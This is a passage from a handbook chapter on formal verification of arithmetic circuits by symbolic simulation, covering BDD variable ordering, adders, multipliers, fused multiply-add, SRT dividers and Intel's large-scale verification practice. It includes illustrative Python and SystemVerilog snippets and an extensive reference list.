symbolic variables not yet read. The less information that needs to be retained about
the values already read, the more concisely the machine can be represented as a
BDD. Although this conceptual analysis is imprecise, it often allows us to estimate
the magnitudes of different BDD representations effectively.
For example, consider the equality comparison a = b between two sym-
bolic vectors a[n : 0] and b[n : 0]. Assume first that the variable ordering is
a[n], . . . , a[0], b[n], . . . , b[0], placing all variables in vector a above vector b.
Consider the state of the “BDD machine” computing a = b after reading the
assignment for all the bits a[n : 0] but none of the bits b[n : 0] yet. At this point,
the machine must remember the value for each a[i] in order to compare it to b[i],
yet to be read, i.e., it must have at least 2^n different states, implying that the size of
the BDD representation for a = b is exponential in n.
Assume then that the variable ordering is interleaved as in a[n], b[n], . . . , a[0],
b[0]. Consider the “BDD machine” computing a = b, and the state of the
machine after reading the assignment for variables a[n], b[n], . . . , a[i], b[i] for any
i. At this point, the machine only needs to distinguish two scenarios: either
a[n : i] = b[n : i], i.e., a and b agree on all bits down to i, or they don't. In the
first case, it is possible that a = b and the remaining bits need to be read to see if
this is actually true, and in the second case, it is already known that a = b is not
true. As, for any i, only two states need to be distinguished, the BDD representation
of a = b is linear in the number of bits n.
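The state-counting view can be made concrete with a small brute-force experiment. The following self-contained Python sketch, which enumerates truth tables directly rather than using any BDD package, counts for each prefix of a variable ordering the distinct residual functions of the unread variables, i.e., the number of states the “BDD machine” must distinguish at that point.

from itertools import product

N = 4  # bits per vector; small enough to enumerate exhaustively

def eq_func(assign):
    # the function under analysis: bit-vector equality a = b
    return all(assign[f'a{i}'] == assign[f'b{i}'] for i in range(N))

def profile(order, f):
    # For each prefix of the variable order, count the distinct residual
    # functions of the not-yet-read variables: the per-level width of the
    # quasi-reduced BDD.
    counts = []
    for k in range(len(order) + 1):
        rest = order[k:]
        states = set()
        for prefix in product([0, 1], repeat=k):
            read = dict(zip(order[:k], prefix))
            states.add(tuple(
                f({**read, **dict(zip(rest, tail))})
                for tail in product([0, 1], repeat=len(rest))))
        counts.append(len(states))
    return counts

msb_first = list(reversed(range(N)))
blocked = [f'a{i}' for i in msb_first] + [f'b{i}' for i in msb_first]
interleaved = [v for i in msb_first for v in (f'a{i}', f'b{i}')]
print('blocked    :', profile(blocked, eq_func))      # peaks at 2**N = 16
print('interleaved:', profile(interleaved, eq_func))  # never exceeds 3

As predicted by the analysis above, the blocked ordering peaks at 2^N states, while the interleaved ordering never needs more than three.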
For large classes of operations, good variable orderings are already known from
previous experience. For example, for most bit-vector operations, such as comparisons
and addition- and subtraction-type operations, a good ordering interleaves the symbolic
data bits from the different inputs, starting from the most significant bit and ending
with the lowest. For operations that use one input as a pointer to manipulate another
input, such as logical and arithmetic shifts, rotates, and selects, a good ordering
places the pointer input symbolic bits above the bits for the input that is manipulated.
The BDD complexity of an operation and the effects of different variable
orderings are best analyzed using the abstract specification of the operation, not
an implementation. This allows the user more freedom to experiment, compute the
results step by step, and pinpoint the specific stage where adverse expression growth
may happen. The authors’ empirical observation has been that a variable ordering
that is good for an abstract specification is almost universally also good for any of
its implementations.
Floating-Point Operations
– Compute a precise, unrounded result on the basis of the inputs. In theory this
would be the infinitely precise result; however, in practice, a sufficiently precise
approximation is enough.
– Normalize the unrounded result.
– Round the normalized result.
In a hardware implementation, the stages may not have clear boundaries. In the
authors’ experience, for most operations, the exponent datapaths computing the
unrounded result tend to involve only calculations with manageable BDD behavior,
such as additions, subtractions, shifts, and so on. Where symbolic complexity
problems exist, they are almost always in the mantissa datapath. The normalization
stage can be expensive to compute symbolically, and where possible, it is helpful to
limit the width of normalization shifts by context-specific information, for example,
by knowledge of any bounds that the unrounded mantissa is known to obey. The
final stage, rounding, tends to be easy to compute symbolically, although rounding
specifications can be tricky to write.
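As a minimal executable sketch of the normalize and round stages, the following Python function rounds an exact positive rational, standing in for a sufficiently precise unrounded result, to p significant bits with round-to-nearest-even; it is a specification-level illustration only, not a model of any particular hardware.

from fractions import Fraction

def round_rne(x, p):
    # Normalize a positive rational to 1 <= x < 2, then round to p
    # significant bits, breaking ties to the even significand.
    # E.g., round_rne(Fraction(1, 3), 4) == Fraction(11, 32).
    assert x > 0
    e = 0
    while x >= 2:
        x /= 2
        e += 1
    while x < 1:
        x *= 2
        e -= 1
    scaled = x * 2 ** (p - 1)          # integer part = p-bit significand
    sig, rem = divmod(scaled.numerator, scaled.denominator)
    frac = Fraction(rem, scaled.denominator)
    if frac > Fraction(1, 2) or (frac == Fraction(1, 2) and sig % 2 == 1):
        sig += 1                        # round up, or break tie to even
    return sig * Fraction(2) ** (e - (p - 1))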
Most unary floating-point operations can be directly verified with symbolic
simulation, including, for example, normalization and denormalization, rounding,
Floating-Point Addition
The solution to this problem pulls together three distinct ingredients. First, since
mantissa addition does not need to be done at all when the exponent differences are
either too large or too small, mantissa addition matters only for a small finite set
of distinct exponent differences. This set can be exhaustively iterated over with a
case split, and each exponent difference can be considered separately. Second, for
each such fixed exponent difference, there is a good variable ordering, aligning the
symbolic variables for the input mantissas according to their position in the addition
after the mantissa shift based on the exponent difference. Third, the technique
of parametric substitutions makes it possible to factor in the condition fixing the
exponent difference and carry out the simulation exactly under the scenario with
the given exponent difference, fixing the mantissa alignment shift both in the
implementation and the specification. Note, in particular, that in the case split, the
input exponents are not fixed themselves, just the difference between them is fixed.
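A driver for such a case split might be organized as in the following Python sketch, where simulate_case(d) is a hypothetical stand-in for one parametrically restricted symbolic simulation run; only the shape of the decomposition is illustrated.

def verify_fp_add(simulate_case, mantissa_bits):
    # The exponent difference d matters only while the two mantissas
    # overlap in the aligned addition; beyond that, the smaller operand
    # contributes at most a round/sticky term, covered here by two
    # catch-all 'far' cases.
    near = range(-(mantissa_bits + 2), mantissa_bits + 3)
    cases = list(near) + ['a_far_below_b', 'b_far_below_a']
    # Parametric substitution restricts each run to inputs whose exponent
    # difference matches d, fixing the alignment shift in both the
    # implementation and the specification.
    return all(simulate_case(d) for d in cases)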
As a further nuance, the true subtraction case, where the two inputs have
opposing signs, may lead to a wide normalization shift prior to rounding in cases
where the exponents are equal or almost equal, and the mantissas cancel each other
out almost completely in the subtraction. As the width of the shift depends on the
mantissa values, it is symbolic and not fixed, which may cause symbolic expression
growth in the normalization and rounding stages. For certain designs, a second-
level case split iterating over the possible widths of the normalization shift and
considering each shift width separately may be needed to contain BDD growth.
Again, the technique of parametric substitutions is essential in enabling us to carry
out the simulation exactly under the scenario with the fixed normalization shift.
For a more detailed floating-point addition verification case study, see Aagaard
et al. (1999a).
Integer Multiplication
property mulppok[i];
@(posedge clk)
( $past(vldA,4) && ( $past(opA,4)==MUL ) && ...
) |->
( $past(ppC[i],2) == ( $past(datainB[1],3) << i ) * ( $past(datainB[2][i],3) ) )
endproperty
property mulwbok;
@(posedge clk)
( $past(vldA,4) && ( $past(opA,4)==MUL ) && ...
) |->
( wbW == $past(ppC[15],2) + ... + $past(ppC[0],2) )
endproperty
In the first stage of the verification, symbolic variables are associated with the
input signals in the stimulus, and the symbolic expressions for the partial products
are computed through simulation. All operations performed on the way from inputs
to partial products are simple and have concise BDD representations.
In the second stage, the partial product signals are weakened, and another set of
symbolic variables is associated with them in the stimulus. Due to the weakening,
the relation between partial products and the inputs is lost, and the partial products
effectively become free inputs in the simulation. The main operations computed
between partial products and the result are all additions. A variable ordering
interleaving the variables associated with the partial product signals according to
their alignment in the addition results in concise BDDs in most cases, allowing the
relation between partial products and the output to be verified by direct simulation.
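For the simple multiplier above, the soundness of the decomposition, i.e., that composing the two stage specifications yields full multiplication, can be illustrated with a short Python check; this sketches the reasoning behind the split, not the symbolic machinery itself.

import random

def pp_spec(A, B, i):
    # stage 1 specification: partial product i of a simple non-Booth
    # multiplier, matching the mulppok property above
    return (A << i) * ((B >> i) & 1)

def wb_spec(pps):
    # stage 2 specification: the writeback is the sum of the partial
    # products, which are treated as free inputs
    return sum(pps)

# composing the stage specifications gives back full multiplication:
for _ in range(1000):
    A, B = random.getrandbits(8), random.getrandbits(8)
    assert wb_spec([pp_spec(A, B, i) for i in range(8)]) == A * B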
Real hardware multipliers are more complex than the simple example here.
Typically, they use Booth or other encodings to reduce the number of partial
products and have optimized adder trees (Booth 1951). However, the verification
principles are the same: the identification of partial products in the design, and the
verification of the relations between the inputs and the partial products, and the
partial products and the result separately. The mathematical “ideal” partial product
that the decomposed reference model refers to does not necessarily exist in a single
signal in the design. Instead, it is a verifier’s abstraction of information extracted
from the simulation. For example, with Booth encodings, a partial product is often
coded as a ones’ complement vector plus a negate bit, and these two added together
form the mathematical notion of a partial product.
Since, in the second stage of the verification, the partial product signals are
weakened and the relation between them and the inputs is lost, the verification is
more general than strictly needed, covering all partial product signal bit combinations
and not only those that are actually realizable in the design. This may lead to spurious
verification failures if the logic downstream from the partial products relies on some
implicit restrictions on the realizable partial product values, for example, when several
partial products are encoded in a more concise set of signals. For a more detailed floating-point
multiplier verification example, see Kaivola and Narasimhan (2001).
Fused Multiply-Add
Fused multiply-addition (FMA) is an operation that performs a multiplication of
two floating-point inputs and the addition of a third input, conceptually infinitely
precisely, and then normalizes and rounds the result of the addition, all in one
operation. FMA differs from a multiplication and an addition done in sequence in
that there is no rounding and subsequent loss of precision between the multiplication
and the addition. Many contemporary arithmetic hardware designs have a fused
multiply-adder as their basic building block.
The verification of a fused multiply-adder can be done with a combination of
the techniques for multipliers and adders. For multiplication, partial products are
identified in the design. Another decomposition point after partial products but
before the addition of the third input may also be needed. The relations between
the inputs and the partial products and the optional second decomposition point
are verified as for a multiply operation. Then, from this point on, the output is
verified as the addition of the product, or sum of partial products, and the third input,
using the same exponent difference-based case split as for floating-point addition.
The symbolic complexity of the normalization stage in a fused multiply-adder is
higher than in a plain multiplier, as an FMA does not guarantee the same kinds
of bounds on the unrounded result that lead to only a few possible normalization
scenarios for the plain multiplication. Handling of denormal input or output values
also increases complexity. Both aspects may necessitate further case splitting to
contain the symbolic complexity of the individual simulations. For more detailed
fused multiply-adder verification examples, see Slobodova and Nagalla (2004),
Slobodova (2006), and KiranKumar et al. (2012). For a related approach with very
similar case splitting considerations, see Jacobi et al. (2005).
Division
While the authors are not aware of any precise theoretical bounds for binary
expression sizes for division along the lines of those for multiplication, experience
has shown that expression growth for division is at least as bad as for multiplication,
and direct verification by symbolic simulation is feasible for only relatively small
operand sizes.
Division differs from all the operations above in two important ways. First,
useful abstract reference models are by necessity relational instead of functional,
describing a variety of correct implementations instead of a single one. Second,
both the reference model algorithms and implementations are iterative, containing a
loop computing increasingly precise approximations of the mathematically precise
result, which in itself may not even be accurately representable in a finite form. An
iterative implementation may either consist of a loop unrolling or the same hardware
being used repeatedly over multiple cycles.
Consider the simple Sweeney-Robertson-Tocher (SRT) type iterative division
algorithm in Fig. 26, using the redundant quotient digit set {−1, 0, 1}. It takes two
normal floating-point numbers as inputs and produces the rounded quotient of the
first input divided by the second. In the pseudo-code the floating-point exponents Ne
and De are viewed as integers, and the mantissas N and D as fractions. The number
of iterations imax depends on the required precision of the result. Conceptually,
enough quotient bits need to be computed to guarantee that the rest of the quotient
does not matter for the result after rounding. In practice, this is the target precision
mantissa size plus a few bits.
The algorithm does not specify the precise selection of the quotient digits qi. Any
selection will do, as long as Q[i] and R[i] are computed from Q[i − 1] and R[i − 1]
consistently using the same qi, and the convergence bound

−D ≤ R[i] < D

is satisfied.
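One concrete radix-2 variant of such an iteration is sketched below in Python; the digit selection and the pre-scaling assumption 0 < N < D are choices made here for clarity and need not match the algorithm of Fig. 26 or any particular design. The assertion checks the convergence bound together with a loop invariant relating the iterates to the exact quotient.

from fractions import Fraction

def srt2_divide(N, D, imax):
    # Radix-2 SRT iteration with the redundant quotient digit set
    # {-1, 0, 1}. Assumes exact rational operands with 0 < N < D, so
    # that the convergence bound holds initially; real designs absorb
    # the scaling into the exponent computation.
    N, D = Fraction(N), Fraction(D)
    Q, R = Fraction(0), N
    for i in range(1, imax + 1):
        w = 2 * R
        # Digit selection: any choice keeping -D <= R[i] < D will do;
        # the redundancy is what lets hardware use an approximate
        # comparison here. This sketch compares exactly.
        q = 1 if w >= D / 2 else (-1 if w < -D / 2 else 0)
        R = w - q * D
        Q += Fraction(q, 2 ** i)
        # loop invariant and convergence bound:
        assert N == Q * D + R / 2 ** i and -D <= R < D
    return Q  # |N/D - Q| <= 2**-imax, since |R| <= D

For example, srt2_divide(Fraction(3, 8), Fraction(3, 4), 24) returns exactly 1/2, the remainder cancelling in the first iteration.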
Conformance to the reference model is verified separately for each iteration.
For iteration i, the previous quotient and remainder Q[i − 1] and R[i − 1] are
considered free inputs, i.e., weakened and associated with fresh symbolic variables
in the stimulus, and the values of the next quotient and remainder Q[i] and R[i]
are computed by symbolic simulation. The relations between the previous and
next values and the convergence bound, expressed as property formulas, are then
verified in the simulation. A downside of the verification of each iteration in
isolation is that any implicit restrictions in the previous quotient and remainder
representations in the circuit are lost, as they are considered free inputs. When the
proper behavior of the circuit logic depends on such restrictions, they need to be
explicitly characterized as invariants. The identification and formulation of such
side invariants often requires detailed understanding of the implementation.
The symbolic expression complexity in the verification of a single iteration is
in most cases easily manageable, as good symbolic variable orderings exist for the
addition and subtraction operations in the loop update relation. The hardest aspect
is the computation of the next quotient digit qi and the update of the remainder R[i]
as a function of qi . As qi itself is a function of the previous remainder R[i − 1],
the next remainder R[i] depends on R[i − 1] in two ways, directly through the
update relation and indirectly through qi . This may set conflicting requirements
for symbolic variable positions in the ordering and lead to expression growth.
The symbolic expression complexity rises as a function of the width of qi , i.e.,
the number of bits computed per iteration. For very high radix dividers, careful
techniques may be needed to manage symbolic expression size, for example, case
splitting on the next quotient digit qi value to cut the double dependency of R[i] on
R[i − 1].
The validation of the reference model, i.e., the question “why do we trust that
the reference model computes division” belongs to the domain of theorem proving
and is discussed in more detail in Kaivola and Aagaard (2000) and O’Leary et al.
(2013). The essence of the argument is that the reference model guarantees the loop
invariant

N = Q[i] · D + 2^(−i) · R[i].
Together with the convergence bound above, this implies that the quotients Q[i]
are increasingly accurate approximations of N/D. For a more detailed example of
divider verification, see Kaivola and Aagaard (2000).
Floating-point square root can be computed by algorithms very similar to those
for division, and the verification approach outlined above extends to square root as
well. The update relation is more intricate and any issues in symbolic expression
growth tend to be worse for square root than for division. On the other hand, the fact
that square root is a unary operation allows direct verification for wider operand
sizes.
Industrial Verification
The previous sections enumerated some of the most common types of arithmetic
circuits and verification strategies for them. In practice, such datapaths seldom occur
in isolation. They are bundled together in an integrated design unit that implements
a family of arithmetic operations, often multiplexing different datapaths together to
maximize circuit reuse. The verification engineer then typically faces the task of
validating all the operations supported by the design. The largest examples of such
verification tasks that the authors have been involved in have encompassed the full
Execution Cluster EXE in Intel Core™ and Intel Atom processor designs, as well
as the graphics floating-point units in Intel Gen graphics designs.
The management of such large-scale verification tasks poses several methodolog-
ical challenges. As a verification method, symbolic simulation requires closer user
guidance than traditional model checking: decisions on signals and times with which
to associate symbolic variables in the stimulus, instantiations of external control
assumptions, judicious weakening to contain simulation scope, variable orderings to
manage symbolic expression complexity, and so on. In a live development project,
this verification collateral needs to be maintained throughout the project timeline
and modified to account for design changes. All verification goals also need to be
frequently revalidated.
To make large-scale verification tasks possible, the verification environment
needs to be highly programmable. In the symbolic simulation verification environ-
ment used for most Intel development projects, this is achieved by embedding the
core symbolic simulator in a code layer called relational STE (rSTE) in the context
of a full-fledged functional programming language. The common computational
complexity reduction techniques discussed above, including weakening, parametric
substitution, etc., are made easily accessible to the user through programmable
options to the tool. The framework also provides sophisticated debug support,
breakpoints, waveform and circuit visualization, etc., to enable the user to quickly
focus on usual verification problems. For the verification of the implication between
the input and output constraints, the tool uses the methods discussed in Kaivola
(2005).
A productive verification environment for large-scale tasks also needs to be
able to take advantage of commonality between individual verification goals. This
commonality occurs in two dimensions: first, between different operations on the
same design, and second, between the same operation on different designs. The first
kind is reflected, for example, in the signals and timing of an operation, or control
assumption instantiations. The second manifests itself in the overall verification
strategies for different types of operations, as outlined in the previous sections.
The existence of reusable tried-and-tested verification strategies or “recipes”
for solving particular classes of problems is a key requirement for reliable and
timely verification work. Such recipes allow the verification engineers either to
identify a computational strategy or to flag a verification task as being of unknown
complexity. In practice, the recipes are represented as code artifacts, not just as
abstract guidelines. This code collateral needs to be sufficiently abstract and design-
independent that it can be used and maintained across different projects over a long
period of time. In the authors’ experience, such code collateral often pays its cost
back the first time it is reused.
In Intel’s verification environment, the reusable collateral for arithmetic verifi-
cation is captured in a single large software artifact called Common Verification
Environment (CVE). It is a result of substantial software and proof engineering
(Kaivola and Kohatsu 2003) to create a standard, uniform methodology for writing
specifications and carrying out verification tasks. The aim of the effort is to
support reuse and code maintenance over a continuously changing design and
separate common and project-specific parts to allow shared code to be written
only once. Programming language paradigms such as algebraic and other structured
datatypes are used to enforce abstraction and shared structure. Code collateral and
related methodology also covers control invariant, state and bypass verification,
and interfaces with mainstream simulation environment for external assumption
checking. For a more detailed exposition, see Kaivola et al. (2009).
Related Work
Carl Seger joined Intel in 1995, bringing the Voss system with him. Voss formed
the basis of a major new system called Forte. Almost immediately Forte saw applica-
tion to floating-point arithmetic in the Intel Pentium Pro processor design project
in the aftermath of the Pentium processor FDIV bug of 1994 (Pratt 1995). Most
of the fundamental techniques described in the current chapter were developed in
this timeframe at Intel’s Strategic CAD Labs (SCL): parametric substitutions (Jones
2002; Aagaard et al. 1999a), many case studies and methodology development
(Jones et al. 2001; O’Leary et al. 1999), manipulating programs as objects through
Lifted FL (Aagaard et al. 1999b) and reasoning about them in the theorem prover
ThmTac (Aagaard et al. 1999c). The wave of development as a whole is summarized
in the overview paper (Seger et al. 2005).
In the next phase, much of the symbolic simulation-based formal verification
work at Intel moved from research groups to dedicated formal verification teams in
the product development organizations. This began with the Pentium 4 processor
development project in 1999. This work included technical advances in verification
of complex circuits such as multipliers (Kaivola and Narasimhan 2001), fused
multiply-adders (Slobodova and Nagalla 2004), and iterative algorithms including
dividers (Kaivola and Aagaard 2000; Aagaard et al. 2000). Advances were made
in verification engineering and the management of large-scale verification tasks in
an active project development setting (Kaivola and Kohatsu 2003). The extension
of STE to a relational formalism like the one used in this chapter was first outlined
in Kaivola (2005), and the overall verification methodology was presented in the
capstone paper (Kaivola et al. 2009). Alongside the wide-scale deployment, the
verification infrastructure was improved by the adoption of the reFLect functional
programming language (Grundy et al. 2006), an evolution of the fl language used
by the original Forte. The precise semantics of the relational extension of STE was
first formulated in the context of the theorem prover Goaled (O’Leary et al. 2013),
tightly connecting symbolic simulation to high-level reasoning.
Outside the area of arithmetic verification, symbolic simulation has been used
for verification of embedded memory arrays (Pandey et al. 1996; Krishnamurthy
et al. 2000), control logic (Kaivola and Naik 2005; Kaivola 2005), and automatic
symbolic indexing abstractions (Adams et al. 2007). Techniques for automatic
refinement of the X-abstraction used in STE are discussed in Tzoref and Grumberg
(2006) and Roorda and Claessen (2006). More recently, symbolic simulation has
been applied to security verification (Bar Kama and Kaivola 2021) and verification
of Error Correction Code (ECC) algorithms and implementations (Gupta et al.
2022).
Extensions of symbolic simulation include word-level methods (Chakraborty
et al. 2017). Also, a formalism and tool called generalized STE (GSTE) (Yang
and Seger 2003) extends symbolic simulation with mechanisms to handle feedback
loops.
The Handbook of Model Checking contains a precise, but very readable, intro-
duction to the theory underlying symbolic trajectory evaluation (Melham 2018).
General treatments of symbolic simulation in practice can be found in the mono-
graphs by Jones (2002) and Bertacco (2006).
A symbolic simulator has been developed and integrated within the ACL2
theorem prover (Swords 2010, 2017; Swords and Davis 2011; Slobodova et al.
2011). The tool supports bit-level and word-level symbolic simulation of both
software and hardware with BDD and AIG representations and implements many
of the paradigms discussed in this chapter. It has been extensively used in industrial
verification (Goel et al. 2021). The simulator is available in open source as part of
ACL2.
The Intel tool Forte described in this chapter is proprietary; however, an evolution
of both Voss and Forte called VossII now exists in open source (VossII 2020).
Acknowledgments This chapter summarizes almost three decades of work. At the time of its
writing, more than 60 people have directly contributed to Intel’s shared arithmetic verification
code-base on over 50 design projects. A much higher number have contributed intellectually to the
endeavor, both inside Intel and at large. It has been a team effort. We would like to express our
sincere thanks to each and every member of the team.
We would also like to thank Intel’s design and validation management over the years for trusting
and encouraging this work. There are more names than we can mention; however, we would like
to express our special thanks to Bob Bentley and Alon Flaisher for their crucial long-term support.
Finally, we would like to thank Jesse Bingham, Levent Erkok, Robert Jones, Joe Leslie-Hurd,
Sayak Ray, and Annette Upton for their detailed feedback on the drafts of this text.
References
Aagaard M, Seger C-J (1995) The formal verification of a pipelined double-precision IEEE
floating-point multiplier. In: Proceedings of IEEE international conference on computer aided
design (ICCAD), pp 7–10
Aagaard MD, Jones RB, Seger C-JH (1999a) Formal verification using parametric representations
of Boolean constraints. In: Proceedings of the 36th annual ACM/IEEE design automation
conference, pp 402–407
Aagaard MD, Jones RB, Seger C-JH (1999b) Lifted-FL: a pragmatic implementation of combined
model checking and theorem proving. In: Theorem proving in higher order logics. Springer,
pp 323–340
Aagaard MD, Melham TF, O’Leary JW (1999c) Xs are for trajectory evaluation, Booleans are for
theorem proving. In: Pierre L, Kropf T (eds) Correct hardware design and verification methods.
Springer, pp 202–218
Aagaard MD, Jones RB, Kaivola R, Kohatsu KR, Seger C-JH (2000) Formal verification of
iterative algorithms in microprocessors. In: Proceedings of the 37th annual design automation
conference, pp 201–206
Adams S, Bjork M, Melham T, Seger C-J (2007) Automatic abstraction in symbolic trajectory
evaluation. In: Formal methods in computer aided design (FMCAD’07), pp 127–135
Akers SB (1978) Binary decision diagrams. IEEE Trans Comput C-27:509–516
Bar Kama N, Kaivola R (2021) Hardware security leak detection by symbolic simulation. In: 2021
formal methods in computer aided design (FMCAD), pp 34–41
Beatty DL, Bryant RE, Seger C-JH (1990) Synchronous circuit verification by symbolic simula-
tion: an illustration. In: Proceedings of the sixth MIT conference on advanced research in VLSI,
pp 98–112
Bertacco V (2006) Scalable hardware verification with symbolic simulation. Springer
Bingham JD (2015) Universal Boolean functional vectors. In: Formal methods in computer-aided
design (FMCAD), pp 25–32
Bingham J, Leslie-Hurd J (2014) Verifying relative error bounds using symbolic simulation. In:
Biere A, Bloem R (eds) Proceedings of the 26th international conference on computer aided
verification (CAV 2014). Lecture notes in computer science, vol 8559. Springer, pp 277–292
Bjesse P, Boralv A (2004) DAG-aware circuit compression for formal verification. In: IEEE/ACM
international conference on computer aided design, 2004. ICCAD-2004, pp 42–49
Booth AD (1951) A signed binary multiplication technique. Q J Mech Appl Math 4:236–240
Bryant RE (1985) Symbolic verification of MOS circuits. In: 1985 Chapel Hill conference on
VLSI, pp 419–438
Bryant RE (1986) Graph-based algorithms for Boolean function manipulation. IEEE Trans Comput
C-35:677–691
Bryant RE (1990) Verification of synchronous circuits by symbolic logic simulation. In: Hardware
specification, verification and synthesis: mathematical aspects. Lecture notes in computer
science, vol 408. Springer, pp 14–24
Bryant RE, Seger C-JH (1990) Formal verification of digital circuits using symbolic ternary system
models. In: International conference on computer aided verification, pp 33–43
Chakraborty S, Khasidashvili Z, Seger C-JH, Gajavelly R, Haldankar T, Chhatani D, Mistry R
(2017) Symbolic trajectory evaluation for word-level verification: theory and implementation.
Formal Methods Syst Des 50(2–3):317–352
Darringer J (1979) The application of program verification techniques to hardware verification. In:
16th design automation conference, pp 375–381
Darringer J, King JC (1978) Applications of symbolic execution to program testing. IEEE Des Test
Comput 51–60
Drane T, Kiran Kumar MA (2022) C-to-RTL equivalence checking. In: Chattopadhyay A (ed)
Handbook of computer architecture. Springer
Goel S, Slobodova A, Sumners R, Swords S (2021) Balancing automation and control for formal
verification of microprocessors. In: Silva A, Leino KRM (eds) Computer aided verification.
Springer, pp 26–45
Grundy J, Melham T, O’Leary J (2006) A reflective functional language for hardware design and
theorem proving. J Funct Program 16(2):157–196
Gupta A, Kaivola R, Mehta M, Singh V (2022) Error correction code algorithm and implementa-
tion verification using symbolic representations. In: Griggio A, Rungta N (eds) Formal methods
in computer aided design (FMCAD), pp 151–159
Harrison J (2009) Handbook of practical logic and automated reasoning. Cambridge University
Press
Hazelhurst S, Seger C-JH (1997) Symbolic trajectory evaluation. In: Kropf T (ed) Formal hardware
verification: methods and systems in comparison. Springer, pp 3–78
IEEE standard for binary floating-point arithmetic (1985) Institute of Electrical and Electronics
Engineers. Note: Standard 754–1985
IEEE standard for SystemVerilog–unified hardware design, specification, and verification language
(2018) IEEE Std 1800-2017 (Revision of IEEE Std 1800-2012), pp 1–1315
Jacobi C, Weber K, Paruthi V, Baumgartner J (2005) Automatic formal verification of fused-
multiply-add FPUs. In: Proceedings of the conference on design, automation and test in Europe
– Volume 2, DATE’05. IEEE Computer Society, pp 1298–1303
Jones RB (2002) Symbolic simulation methods for industrial formal verification. Springer
Jones RB, O’Leary JW, Seger C-JH, Aagaard MD, Melham TF (2001) Practical formal verification
in microprocessor design. IEEE Des Test Comput 18(4):16–25
Kaivola R (2005) Formal verification of Pentium 4 components with symbolic simulation and
inductive invariants. In: Etessami K, Rajamani SK (eds) Computer aided verification. Springer,
pp 170–184
Kaivola R, Aagaard M (2000) Divider circuit verification with model checking and theorem
proving. In: Theorem proving in higher order logics. TPHOLs 2000. Lecture notes in computer
science, vol 1869. Springer, pp 338–355
Kaivola R, Kohatsu KR (2003) Proof engineering in the large: formal verification of Pentium 4
floating-point divider. Int J Softw Tools Technol Transf 4(3):323–334
Kaivola R, Naik A (2005) Formal verification of high-level conformance with symbolic sim-
ulation. In: Tenth IEEE international high-level design validation and test workshop, 2005,
pp 153–159
Kaivola R, Narasimhan N (2001) Formal verification of the Pentium 4 multiplier. In: Proceedings
sixth IEEE international high-level design validation and test workshop, Los Alamitos. IEEE
Computer Society, pp 115–120
Kaivola R, Ghughal R, Narasimhan N, Telfer A, Whittemore J, Pandav S, Slobodová A, Taylor
C, Frolov V, Reeber E, Naik A (2009) Replacing testing with formal verification in Intel
Core i7 processor execution engine validation. In: Bouajjani A, Maler O (eds) Computer aided
verification. Springer, pp 414–429
Kaivola R, Bar Kama N (2022) Timed causal fanin analysis for symbolic circuit simulation. In:
Griggio A, Rungta N (eds) Formal methods in computer aided design (FMCAD), pp 99–107
King JC (1979) Symbolic execution and program testing. Commun ACM 19(7):385–394
KiranKumar VMA, Gupta A, Ghughal R (2012) Symbolic trajectory evaluation: the primary
validation vehicle for next generation Intel processor graphics FPU. In: 2012 formal methods in
computer-aided design (FMCAD), pp 149–156
Krishnamurthy N, Martin AK, Abadir MS, Abraham JA (2000) Validating PowerPC microproces-
sor custom memories. IEEE Des Test Comput 17(4):61–76
Kuehlmann A, Paruthi V, Krohm F, Ganai M (2002) Robust Boolean reasoning for equivalence
checking and functional property verification. IEEE Trans Comput-Aided Des Integr Circuits
Syst 21(12):1377–1394
Melham T (2018) Symbolic trajectory evaluation. In: Clarke EM, Henzinger TA, Veith H, Bloem
R (eds) Handbook of model checking, ch. 25. Springer, pp 831–870
O’Leary J, Zhao X, Gerth RT, Seger C-JH (1999) Formally verifying IEEE compliance of floating-
point hardware. Intel Tech J, pp 1–14
O’Leary J, Kaivola R, Melham T (2013) Relational STE and theorem proving for formal
verification of industrial circuit designs. In: 2013 formal methods in computer-aided design,
pp 97–104
Pandey M, Raimi R, Beatty DL, Bryant RE (1996) Formal verification of PowerPC arrays using
symbolic trajectory evaluation. In: DAC’96: proceedings of the 33rd annual design automation
conference. Association for Computing Machinery, pp 649–654
Pratt V (1995) Anatomy of the Pentium bug. In: Mosses PD, Nielsen M, Schwartzbach MI (eds)
TAPSOFT’95: theory and practice of software development. Springer, pp 97–107
Ray S, Goel S (2022) Theorem proving. In: Chattopadhyay A (ed) Handbook of computer
architecture. Springer
Roorda J-W, Claessen K (2006) SAT-based assistance in abstraction refinement for symbolic
trajectory evaluation. In: Ball T, Jones RB (eds) Computer aided verification. Springer,
pp 175–189
Russinoff DM (1998) A mechanically checked proof of IEEE compliance of the floating point
multiplication, division and square root algorithms of the AMD-K7 processor. LMS J Comput
Math 1:148–200
Russinoff D (2019) Formal verification of floating-point hardware design. Springer
Seger C-JH (1993) Voss – a formal hardware verification system user's guide. https://doi.org/10.5555/901942
Seger C-JH, Bryant RE (1995) Formal verification by symbolic evaluation of partially-ordered
trajectories. Formal Methods Syst Des 6:147–190
Seger C-J, Jones R, O’Leary J, Melham T, Aagaard M, Barrett C, Syme D (2005) An industrially
effective environment for formal hardware verification. IEEE Trans Comput-Aided Des Integr
Circuits Syst 24(9):1381–1405
Seligman E, Schubert T, Kiran Kumar MVA (2015) Formal verification: an essential toolkit for
modern VLSI design. Morgan Kaufmann Publishers Inc.
Slobodova A (2006) Challenges for formal verification in industrial setting. In:
FMICS’06/PDMC’06: Proceedings of the 11th international workshop, FMICS 2006
and 5th international workshop, PDMC conference on formal methods: applications and
technology. Springer, pp 1–22
Slobodova A, Nagalla K (2004) Formal verification of floating point multiply add on Itanium
processor. In: Fifth international workshop on designing correct circuits, ETAPS 2004
Slobodova A, Davis J, Swords S, Hunt W (2011) A flexible formal verification environment for
industrial scale verification. In: Ninth ACM/IEEE international conference on formal methods
and models for codesign (MEMOCODE2011), pp 89–97
Swords SO (2010) A verified framework for symbolic execution in the ACL2 theorem prover. PhD
thesis, University of Texas at Austin. http://hdl.handle.net/2152/ETD-UT-2010-12-2210
Swords S (2017) Term-level reasoning in support of bit-blasting. In: Slobodova A, Hunt WA Jr
(eds) Proceedings 14th international workshop on the ACL2 theorem prover and its applications,
Austin, 22–23 May 2017. Electronic proceedings in theoretical computer science, vol 249. Open
Publishing Association, pp 95–111
Swords S, Davis J (2011) Bit-blasting ACL2 theorems. In: Hardin D, Schmaltz J (eds) Proceedings
10th international workshop on the ACL2 theorem prover and its applications, Austin, 3–4
Nov 2011. Electronic proceedings in theoretical computer science, vol 70. Open Publishing
Association, pp 84–102
Tzoref R, Grumberg O (2006) Automatic refinement and vacuity detection for symbolic trajectory
evaluation. In: Ball T, Jones RB (eds) Computer aided verification. Springer, pp 190–204
